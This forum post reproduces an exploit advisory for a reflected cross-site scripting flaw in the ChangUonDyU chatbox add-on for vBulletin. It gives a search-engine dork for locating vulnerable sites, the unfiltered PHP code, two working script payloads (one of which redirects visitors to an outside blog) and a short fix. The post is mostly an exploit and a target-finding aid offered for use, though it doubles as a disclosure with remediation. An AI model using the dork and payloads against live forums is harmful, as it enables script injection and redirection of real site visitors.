• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

Admin

Well-Known Member
Staff member
Administrator
# Exploit Title: ChangUonDyU - Extra File Chatbox XSS vulnerability at Archive
# Google Dork: intitle:"Tin nhắn lưu trữ" and inurl:archive.php?page=
# Date: 24/06/2013
# Exploit Author: Juno_okyo
# Version: 3.6.0 (may affect other versions)
# Tested on: vBulletin 3.8.7 (and affect other versions)
# CVE :
Code:
http://www.vbulletin.com/

##################################################################
Vulnerability:
##################################################################
An input unfiltered help we can exploit an XSS vulnerability:
PHP:
if ($_GET['page'])
{
$page = $_GET['page'];
}
else
{
$page = 1;
}

##################################################################
Exploitation:
##################################################################
We can inject script for a XSS attack:
Code:
archive.php?page=<script>alert("XSS was found!")</script> archive.php?page=<script>location.href="http://junookyo.blogspot.com/"</script>
itvk.png
​​
##################################################################
How to fix:
##################################################################
Edit archive.php file, we need filter to prevent script injection:
PHP:
if ($_GET['page']) { $page = htmlentities(strip_tags($_GET['page'])); } else { $page = 1; }


 

Facebook Comments

New posts New threads New resources

Back
Top